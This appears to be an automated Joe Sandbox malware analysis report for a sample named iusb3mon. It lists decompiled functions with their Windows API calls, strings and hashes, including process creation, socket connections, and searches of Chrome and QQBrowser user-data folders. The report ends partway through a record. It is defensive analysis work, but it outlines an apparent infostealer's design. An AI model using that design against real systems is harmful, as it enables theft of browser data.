Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
String ID:
API String ID: 168474834-0
Opcode ID: 86c7bae3511b9752e4f450880fa59caf6c0bb0243538488e36e99d70cbc80b45
Instruction ID: 21239705d29d2f1bf77acae21af1097cd02c48376ee7da9455f244707f3c9bac
Opcode Fuzzy Hash: 86c7bae3511b9752e4f450880fa59caf6c0bb0243538488e36e99d70cbc80b45
Instruction Fuzzy Hash: 9C119E72920304BBEBA16BB5CD49EBFBABEEF85B01F100419FA48C5011D6F1D901EB20

Function 062A1FA5 Relevance: 10.7, APIs: 7, Instructions: 186processsynchronizationCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(0629E9E9,0629E9E9,00000000,00000000,00000001,000000FF,062AE590,00000000,?,?,00000000,00000000,062BEE8C), ref: 062A210C
GetLastError.KERNEL32 ref: 062A2114
WaitForSingleObject.KERNEL32(?,000000FF), ref: 062A2151
GetExitCodeProcess.KERNEL32(?,?), ref: 062A215E
CloseHandle.KERNEL32(?), ref: 062A2167
CloseHandle.KERNEL32(?), ref: 062A2174
CloseHandle.KERNEL32(0629EA45), ref: 062A2184

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: CloseHandle$Process$CodeCreateErrorExitLastObjectSingleWait
String ID:
API String ID: 966596688-0
Opcode ID: d037ca4bf538df4f32fa9ac6947ef99670033c983eeaebc303ba064faa549a50
Instruction ID: 45a2cd467b5a910af85e9454f2a9728a69ab3d5ab300d94702260661ae4564b3
Opcode Fuzzy Hash: d037ca4bf538df4f32fa9ac6947ef99670033c983eeaebc303ba064faa549a50
Instruction Fuzzy Hash: CF612571C2034ADFDF618F68CC88AADBBB5EF45324F18815AED619B191C7F19A01CB60

Function 00341B50 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 162COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00341BD3
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00341C1F
__Getctype.LIBCPMT ref: 00341C38
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00341C54
std::_Lockit::~_Lockit.LIBCPMT ref: 00341CE9

Strings

bad locale name, xrefs: 00341D07

Memory Dump Source

Source File: 0000001E.00000002.4665809368.0000000000341000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00340000, based on PE: true

Associated: 0000001E.00000002.4665515553.0000000000340000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666146444.000000000035E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666408946.000000000036C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666641264.000000000036E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666973971.00000000003A2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667717172.00000000003A3000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003D1000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003D3000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000419000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000421000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000423000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000425000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000042F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000441000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000443000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000445000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000447000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000449000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000451000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000045F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000462000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000467000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000469000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000471000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000473000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000497000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000049C000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4678100485.000000000072F000.00000020.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_340000_iusb3mon.jbxd

Similarity

API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: bad locale name
API String ID: 1840309910-1405518554
Opcode ID: f9124494b247833b82c216625d8398f568818cd3173157b519bfdefbdd66203a
Instruction ID: 956b3b9dc031166f2b14236c314bf17caa82d0d5e0de051499d0078f25c0e022
Opcode Fuzzy Hash: f9124494b247833b82c216625d8398f568818cd3173157b519bfdefbdd66203a
Instruction Fuzzy Hash: 88516EB1D006489BDB11DFE4D985B9EBBF8AF14710F144129E804AF241E775FA48CB92

Function 062941BC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 98filestringCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,00000000,?,?), ref: 0629420B
WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?), ref: 0629422E
CloseHandle.KERNEL32(00000000,?,?), ref: 06294240
wsprintfA.USER32 ref: 06294271
lstrcpyA.KERNEL32(?,?,?,?), ref: 0629428A

Part of subcall function 06293FC8: wsprintfA.USER32 ref: 062940AA

Strings

%s %s, xrefs: 0629426B

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Filewsprintf$CloseCreateHandleWritelstrcpy
String ID: %s %s
API String ID: 3555437440-2939940506
Opcode ID: b8bcb3000611a5b2040823ef63d129bc15e531fa5b7e2f45614560de4ab21bd6
Instruction ID: be40c52a305bf6f7d774b523ce893b84ac6f835223b9f71778a0ef013b773af0
Opcode Fuzzy Hash: b8bcb3000611a5b2040823ef63d129bc15e531fa5b7e2f45614560de4ab21bd6
Instruction Fuzzy Hash: CF315A72D10219ABEF50EAB4EC89FDB77BCAB44355F000592FA05E6480E6719A85CB70

Function 06291434 Relevance: 10.6, APIs: 7, Instructions: 87networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0629180D: setsockopt.WS2_32(?,0000FFFF,00000080,00000000,00000004), ref: 06291832
Part of subcall function 0629180D: CancelIo.KERNEL32(?,?,?,?,0629560D), ref: 0629183B
Part of subcall function 0629180D: InterlockedExchange.KERNEL32(?,00000000), ref: 06291847
Part of subcall function 0629180D: closesocket.WS2_32(?), ref: 06291850
Part of subcall function 0629180D: SetEvent.KERNEL32(?,?,?,?,0629560D), ref: 06291859

ResetEvent.KERNEL32(?,00000000,?,00000000,?,?,06295555,?,00000000), ref: 06291451
socket.WS2_32(00000002,00000001,00000006), ref: 06291460
gethostbyname.WS2_32(?), ref: 06291471
htons.WS2_32(?), ref: 06291486
connect.WS2_32(?,00000002,00000010), ref: 062914A3
setsockopt.WS2_32(?,0000FFFF,00000008,00000000,00000004), ref: 062914C8
WSAIoctl.WS2_32(?,98000004,00000000,0000000C,00000000,00000000,?,00000000,00000000), ref: 062914F9

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Eventsetsockopt$CancelExchangeInterlockedIoctlResetclosesocketconnectgethostbynamehtonssocket
String ID:
API String ID: 4281462294-0
Opcode ID: d27d55584eb7bdc85e13491ec38616fd9376966c023ffa6cf9d43a8aabc90211
Instruction ID: 0ac177ceed98a87653f9a1da2ea5c05dfdd7d808d98e0186c995547cf7f01100
Opcode Fuzzy Hash: d27d55584eb7bdc85e13491ec38616fd9376966c023ffa6cf9d43a8aabc90211
Instruction Fuzzy Hash: 9831C271900309BFEB109FA5DC89EAABBBDEF48314F004525FA51A2290C7B199549B70

Function 06294D89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 79fileCOMMON

Download Yara Rule

APIs

SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001C,00000000), ref: 06294DBD
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 06294E10
GetFileSize.KERNEL32(00000000,00000000), ref: 06294E21
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 06294E3C

Part of subcall function 06294D3F: LocalAlloc.KERNEL32(00000040,?), ref: 06294D52
Part of subcall function 06294D3F: LocalFree.KERNEL32(00000000,00000000,?), ref: 06294D7A

CloseHandle.KERNEL32(?), ref: 06294E59

Strings

.dat, xrefs: 06294DEB

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFolderFreeHandlePathReadSizeSpecial
String ID: .dat
API String ID: 3272996501-100240174
Opcode ID: 2bbd49afb73db0a787fce87fb0a31ecdf69dcb71f58bdb60c517679068bc5d73
Instruction ID: cf469d3e9ba282d008696b7f0fbd976adf9a9b561e78bdef727d0d50b44fe1bc
Opcode Fuzzy Hash: 2bbd49afb73db0a787fce87fb0a31ecdf69dcb71f58bdb60c517679068bc5d73
Instruction Fuzzy Hash: 92219571D1030CBBDF51AEA49C8AFDF7B7DEB48354F1004A9FB15A2140D6B09A459B70

Function 062943C6 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 77stringprocessCOMMON

Download Yara Rule

APIs

Part of subcall function 062991B3: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00000000,00000000,00000000), ref: 06299216
Part of subcall function 062991B3: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 0629922E
Part of subcall function 062991B3: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 0629923E
Part of subcall function 062991B3: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 0629924E
Part of subcall function 062991B3: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 0629925B
Part of subcall function 062991B3: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 06299268
Part of subcall function 062991B3: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 062993F3

lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 06294421
lstrcpyA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 06294446
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0629448C

Strings

Applications\iexplore.exe\shell\open\command, xrefs: 06294404
WinSta0\Default, xrefs: 06294462
D, xrefs: 06294459

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$CreateFreeLoadProcesslstrcpylstrlen
String ID: Applications\iexplore.exe\shell\open\command$D$WinSta0\Default
API String ID: 326945973-490771695
Opcode ID: 41d92e5704f7d48c65629e03fd114a103fe06829b9ce698b85a0d68f5e19b011
Instruction ID: 2554d4f4899fac574c5cf092f009fd4af0c3a4457bc71c5db1372ff6649f93b5
Opcode Fuzzy Hash: 41d92e5704f7d48c65629e03fd114a103fe06829b9ce698b85a0d68f5e19b011
Instruction Fuzzy Hash: 78116372911629AADFA09EE1DC4CEDB7BBCFF81751F004415BE05E6140DA749686CFB0

Function 00351001 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,003423D4,?,A302B08A,?,0035110E,000000FF,0035D604,003423D4,00000000), ref: 003510C2

Strings

ext-ms-, xrefs: 0035106C
api-ms-, xrefs: 00351058

Memory Dump Source

Source File: 0000001E.00000002.4665809368.0000000000341000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00340000, based on PE: true

Associated: 0000001E.00000002.4665515553.0000000000340000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666146444.000000000035E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666408946.000000000036C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666641264.000000000036E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666973971.00000000003A2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667717172.00000000003A3000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003D1000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003D3000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000419000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000421000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000423000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000425000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000042F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000441000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000443000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000445000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000447000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000449000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000451000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000045F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000462000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000467000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000469000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000471000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000473000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000497000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000049C000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4678100485.000000000072F000.00000020.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_340000_iusb3mon.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: aa73827d8606b1a68af94403bfac9ae8fea7139cf6d32f3d767f9862e4070e39
Instruction ID: 967aa2e64fdb72e65f2472765e4437f4c92fed908e76e3371521b52ace044996
Opcode Fuzzy Hash: aa73827d8606b1a68af94403bfac9ae8fea7139cf6d32f3d767f9862e4070e39
Instruction Fuzzy Hash: DB21D271E01250ABCB239B21DC45F5A376CEB417A2F260210ED05A72F1DA70EE48CAE0

Function 062A3F94 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 61stringCOMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 062A3FD2
GetSystemMetrics.USER32(00000000), ref: 062A3FEA
GetSystemMetrics.USER32(00000001), ref: 062A3FF1
lstrcpyA.KERNEL32(?,DISPLAY), ref: 062A4015

Strings

B, xrefs: 062A3FB3
DISPLAY, xrefs: 062A400F

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: System$Metrics$InfoParameterslstrcpy
String ID: B$DISPLAY
API String ID: 1409579217-3316187204
Opcode ID: 5c143bb590b29f97f062cefa6489ee1fcb614a4da0a92c5aa8dfb4e13c175632
Instruction ID: ed36e1de64315ff5239fa5c5aa583dbf1eac2a5e84e2acd0b3a08ee1eaa3c45c
Opcode Fuzzy Hash: 5c143bb590b29f97f062cefa6489ee1fcb614a4da0a92c5aa8dfb4e13c175632
Instruction Fuzzy Hash: C3110271A20320AFCB51AF68DC88A9BBFE8EF18751B004012FE05DE042D3F1D541EBA0

Function 06294796 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 57sleepCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0629479B

Part of subcall function 06293441: __EH_prolog.LIBCMT ref: 06293446
Part of subcall function 06293441: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0629345C
Part of subcall function 06293441: Process32First.KERNEL32(00000000,?), ref: 06293475

SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 062947C9

Part of subcall function 062A87FB: lstrlenA.KERNEL32(?), ref: 062A883F

Part of subcall function 062A8633: __EH_prolog.LIBCMT ref: 062A8638

Part of subcall function 062A85BF: __EH_prolog.LIBCMT ref: 062A85C4

Part of subcall function 062A84B1: InterlockedDecrement.KERNEL32(-000000F4), ref: 062A84C5

Sleep.KERNEL32(000003E8,?,00000000,\AppData\Local\Google\Chrome\User Data\Default,?,C:\Users\,?), ref: 06294825

Part of subcall function 06292E2C: __EH_prolog.LIBCMT ref: 06292E31
Part of subcall function 06292E2C: FindFirstFileA.KERNEL32(?,?), ref: 06292EBF
Part of subcall function 06292E2C: FindNextFileA.KERNEL32(00000000,00000010,00000001,?,?,00000001), ref: 06292F7F

Strings

\AppData\Local\Google\Chrome\User Data\Default, xrefs: 06294801
C:\Users\, xrefs: 062947F6
chrome.exe, xrefs: 062947AC

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: H_prolog$FileFindFirst$CreateDecrementFolderInterlockedNextPathProcess32SleepSnapshotSpecialToolhelp32lstrlen
String ID: C:\Users\$\AppData\Local\Google\Chrome\User Data\Default$chrome.exe
API String ID: 12226711-2559963756
Opcode ID: d686ea55e324a4fc39304fc17dd55de31aac105bf5b5456dcd100379131f19c6
Instruction ID: 83977e4c64734e3905248400341ebc6c24a565f206f7fe7d19947f531a9bc3f5
Opcode Fuzzy Hash: d686ea55e324a4fc39304fc17dd55de31aac105bf5b5456dcd100379131f19c6
Instruction Fuzzy Hash: 85118672D60309EBDB85EBE0DD4AFEEB7B8AF14700F104155AA61B21C0DBB85B04CB61

Function 06294A1D Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 57sleepCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 06294A22

Part of subcall function 06293441: __EH_prolog.LIBCMT ref: 06293446
Part of subcall function 06293441: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0629345C
Part of subcall function 06293441: Process32First.KERNEL32(00000000,?), ref: 06293475

SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 06294A50

Part of subcall function 062A87FB: lstrlenA.KERNEL32(?), ref: 062A883F

Part of subcall function 062A8633: __EH_prolog.LIBCMT ref: 062A8638

Part of subcall function 062A85BF: __EH_prolog.LIBCMT ref: 062A85C4

Part of subcall function 062A84B1: InterlockedDecrement.KERNEL32(-000000F4), ref: 062A84C5

Sleep.KERNEL32(000003E8,?,00000000,\AppData\Local\Tencent\QQBrowser\User Data\Default,?,C:\Users\,?), ref: 06294AAC

Part of subcall function 06292E2C: __EH_prolog.LIBCMT ref: 06292E31
Part of subcall function 06292E2C: FindFirstFileA.KERNEL32(?,?), ref: 06292EBF
Part of subcall function 06292E2C: FindNextFileA.KERNEL32(00000000,00000010,00000001,?,?,00000001), ref: 06292F7F

Strings

QQBrowser.exe, xrefs: 06294A33
C:\Users\, xrefs: 06294A7D
\AppData\Local\Tencent\QQBrowser\User Data\Default, xrefs: 06294A88

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: H_prolog$FileFindFirst$CreateDecrementFolderInterlockedNextPathProcess32SleepSnapshotSpecialToolhelp32lstrlen
String ID: C:\Users\$QQBrowser.exe$\AppData\Local\Tencent\QQBrowser\User Data\Default
API String ID: 12226711-2662846904
Opcode ID: 5827da9754a5482bc07b818a1341b52beae33212721349f78306913690a55790
